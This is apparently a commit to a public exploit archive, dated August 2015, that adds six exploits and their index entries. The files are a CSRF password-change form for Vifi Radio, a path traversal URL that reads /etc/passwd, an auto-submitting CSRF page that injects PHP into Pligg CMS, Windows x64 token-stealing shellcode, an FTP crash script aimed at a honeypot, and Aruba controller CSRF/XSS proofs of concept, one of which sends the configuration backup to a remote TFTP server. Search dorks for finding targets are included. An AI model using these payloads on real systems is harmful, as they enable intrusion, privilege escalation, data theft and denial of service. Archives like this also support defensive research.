DB: 2015-08-21

6 new exploits
2015-08-21 05:02:09 +00:00 · 2015-08-21 05:02:09 +00:00 · 6dccd55e18
commit 6dccd55e18
parent 1ef6c23cb9
7 changed files with 251 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -10740,7 +10740,7 @@ id,file,description,date,author,platform,type,port
 11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0
 11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Include",2010-03-15,jdc,php,webapps,0
 11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0
-11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow (meta)",2010-03-15,blake,windows,remote,0
+11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (meta)",2010-03-15,blake,windows,remote,0
 11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Include",2010-03-15,jdc,php,webapps,0
 11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross-Site Scripting Vulnerability",2010-03-15,indoushka,php,webapps,0
 11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload Vulnerability",2010-03-15,indoushka,php,webapps,0
@ -34204,3 +34204,9 @@ id,file,description,date,author,platform,type,port
 37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999
 37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
 37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
 37889,platforms/linux/remote/37889.txt,"YingZhiPython Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-09-26,"Larry Cashdollar",linux,remote,0
 37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
 37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - CSRF Vulnerability",2015-08-20,KnocKout,asp,webapps,80
 37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,"_ Un_N0n _",windows,dos,21
 37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
 37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
--- a/platforms/asp/webapps/37892.txt
+++ b/platforms/asp/webapps/37892.txt
@ -0,0 +1,51 @@
                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \
                        \_____  \  |    __)_ /    \  \/   http://h4x0resec.blogspot.com
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/         
 Vifi Radio v1 - CSRF (Arbitrary Change Password) Exploit
 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 [+] Discovered by: KnocKout
 [~] Contact : knockout@e-mail.com.tr
 [~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com
 [~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker,
 Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov
 ############################################################
 ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 |~Web App. : Vifi Radio
 |~Affected Version : v1
 |~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html 
 |~Official Demo :  http://radyo.vifibilisim.com
 |~RISK : Medium
 |~DORK : inurl:index.asp?radyo=2
 |~Tested On : [L] Windows 7, Mozilla Firefox
 ########################################################
 ----------------------------------------------------------
                      PoC
 ----------------------------------------------------------
 <html>
  <body>
    <form action="http://[TARGET]/yonetim/kullanici-kaydet.asp?tur=g" method="POST">
      <input type="hidden" name="rutbe" value="1" />
      <input type="hidden" name="djadi" value="0" />
      <input type="hidden" name="resim" value="Vifi+Bili%FEim" />
      <input type="hidden" name="firma" value="USERNAME" />
      <input type="hidden" name="link" value="PASSWORD" />
      <input type="hidden" name="sira" value="23" />
      <input type="hidden" name="ilet" value="G%D6NDER" />
      <input type="hidden" name="Submit" value="Exploit!" />
 	  <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 ############################
 "Admin Panel: /yonetim "
 ############################
--- a/platforms/linux/remote/37889.txt
+++ b/platforms/linux/remote/37889.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/55685/info
 An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process.
 YingZhiPython 1.9 is vulnerable; other versions may also be affected. 
 ftp://www.example.com/../../../../../../../private/etc/passwd 
--- a/platforms/php/webapps/37894.html
+++ b/platforms/php/webapps/37894.html
@ -0,0 +1,56 @@
 <!--
 # Exploit Title: Pligg CMS Arbitrary Code Execution
 # Google Dork: intext:"Made wtih Pligg CMS"
 # Date: 2015/8/20
 # Exploit Author: Arash Khazaei
 # Vendor Homepage: http://pligg.com
 # Software Link:
 https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip
 # Version: 2.0.2
 # Tested on: Kali , Iceweasel Browser
 # CVE : N/A
 # Contact : http://twitter.com/0xClay
 # Mail : 0xclay@gmail.com
 # Site : http://bhunter.ir
 # Description :
 # Pligg CMS Is A CMS Writed In PHP Language And Licensed Under GPL V 2.0
 # In Pligg CMS Panel In Adding Page Section Pligg CMS Allow To Admin Add
 PHP Codes In {php} {/php} Tags
 # A CSRF Vulnerabilty In Adding Page Section Allow To Attacker To Execute
 PHP Codes On Server .
 # In This Exploit I Just Added a echo '<h1> Hacked </h1>'; Code You Can
 Customize Exploit For Your Self .
 # Exploit :
 -->
 <html>
 <body onload="document.exploit.submit();">
 <form action="http://localhost/pligg-cms/admin/submit_page.php"
 method="POST" id="thisform" name="exploit">
 <input type="hidden" name="page_title" id="page_title"
 size="66"value="Hacked"/>
 <input type="hidden" name="page_url" id="page_url" size="66"
 value="Hacked"/>
 <input type="hidden" name="page_keywords" id="page_keywords" size="66"
 value="Hacked"/>
 <input type="hidden" name="page_description" id="page_description"
 size="66" value="Hacked"/>
 <textarea type="hidden"id="textarea-1" name="page_content"
 class="form-control page_content" rows="15"> {php}echo '<h1> Hacked </h1>';
 {/php} &lt;/textarea&gt;
 <input type="hidden" name="process" value="new_page" />
 <input type="hidden" name="randkey" value="12412532" />
 </form>
 </body>
 </html>
 <!--
 # After HTML File Executed You Can Access Page In
 http://localhost/pligg-cms/page.php?page=Hacked
 # Discovered By Arash Khazaei . (Aka JunkyBoy (Nick Name Changed :P ))
 -->
--- a/platforms/win64/shellcode/37895.asm
+++ b/platforms/win64/shellcode/37895.asm
@ -0,0 +1,56 @@
 ;token stealing shellcode Win 2003 x64
 ;based on the widely available x86 version
 ;syntax for NASM
 ;Author: Csaba Fitzl, @theevilbit
 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
 ;important structures and offsets;
 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
 ;kd> dt -r1 nt!_TEB
 ;   +0x110 SystemReserved1  : [54] Ptr64 Void
 ;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly
 ;kd> dt -r1 nt!_KTHREAD
 ;   +0x048 ApcState         : _KAPC_STATE
 ;     +0x000 ApcListHead      : [2] _LIST_ENTRY
 ;	  +0x020 Process          : Ptr64 _KPROCESS
 ;kd> dt -r1 nt!_EPROCESS
 ;   +0x0d8 UniqueProcessId  : Ptr64 Void
 ;   +0x0e0 ActiveProcessLinks : _LIST_ENTRY
 ;     +0x000 Flink            : Ptr64 _LIST_ENTRY
 ;     +0x008 Blink            : Ptr64 _LIST_ENTRY
 ;  +0x160 Token            : _EX_FAST_REF
 ;     +0x000 Object           : Ptr64 Void
 ;     +0x000 RefCnt           : Pos 0, 4 Bits
 ;     +0x000 Value            : Uint8B
 BITS 64
 global start
 section .text
 start:
 mov 	rax, [gs:0x188] 	 	;Get current ETHREAD in
 mov 	rax, [rax+0x68]   		;Get current EPROCESS address
 mov 	rcx, rax                ;Copy current EPROCESS address to RCX
 find_system_process:
 mov 	rax, [rax+0xe0]   		;Next EPROCESS ActiveProcessLinks.Flink
 sub		rax, 0xe0				;Go to the beginning of the EPROCESS structure
 mov		r9 , [rax+0xd8]			;Copy PID to R9
 cmp 	r9 , 0x4    			;Compare R9 to SYSTEM PID (=4)
 jnz short find_system_process   ;If not SYSTEM got to next EPROCESS
 stealing:
 mov 	rdx, [rax+0x160] 		;Copy SYSTEM process token address to RDX
 mov 	[rcx+0x160], rdx		;Steal token with overwriting our current process's token address
 retn 	0x10
 ;byte stream:
 ;"\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x40\x68\x48\x89\xc1"
 ;"\x48\x8b\x80\xe0\x00\x00\x00\x48\x2d\xe0\x00\x00\x00\x4c\x8b\x88"
 ;"\xd8\x00\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x60\x01\x00"
 ;"\x00\x48\x89\x91\x60\x01\x00\x00\xc2\x10\x00"
--- a/platforms/windows/dos/37893.py
+++ b/platforms/windows/dos/37893.py
@ -0,0 +1,41 @@
 """
 ********************************************************************************************
 # Exploit Title: Valhala Honeypot Stack based BOF(Remote DOS)
 # Date: 8/20/2015
 # Exploit Author: Un_N0n
 # Software Developer: Marcos Flavio Araujo Assuncao
 # Software Link: http://sourceforge.net/projects/valhalahoneypot/
 # Version: 1.8
 # Tested on: Windows 7 x86(32 BIT)
 ********************************************************************************************
 [Steps to Produce the Crash]:
 1- Open 'honeypot.exe'.
 2- Enter the IP of the machine on which this honeypot is running, in this case it is your own
   machine i.e 127.0.0.1.
 3- Run the script.
 ~ Software crashes. 
 [Code to crash honeypot]: 
 ==============================================================
 """
 import socket
 while True:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("IP_ADDR",21))
    s.send('USER test\r\n')
    s.send('PASS test\r\n')
    s.send('ABOR '+'A'*2000+'\r\n')
    s.recv(1024)
    s.send('ABOR '+'A'*5000+'\r\n')
    s.recv(1024)
    s.send('ABOR '+'A'*6000+'\r\n')
    s.recv(1024)
    s.send('QUIT\r\n')
    s.close()
 ==============================================================
 **********************************************************************************************
--- a/platforms/xml/webapps/37891.txt
+++ b/platforms/xml/webapps/37891.txt
@ -0,0 +1,33 @@
 # Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
 # Date: 08/016/2015
 # Author: Itzik Chen (itzik1 at gmail.com)
 # Product web page: http://www.arubanetworks.com
 # Affected Version: 6.4.2.8
 # Tested on: Aruba7240, Ver 6.2.4.8
 Summary
 ================
 Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
 Arube Controller suffers from CSRF and XSS vulnerabilities.
 Proof of Concept - CSRF
 =========================
 192.168.0.1 - Controller IP-Address
 172.17.0.1 - Remote TFTP server 
 <IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">
 That will send the flashbackup configuration file to a remote TFTP server.
 Proof of Concept - XSS
 =========================
 https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>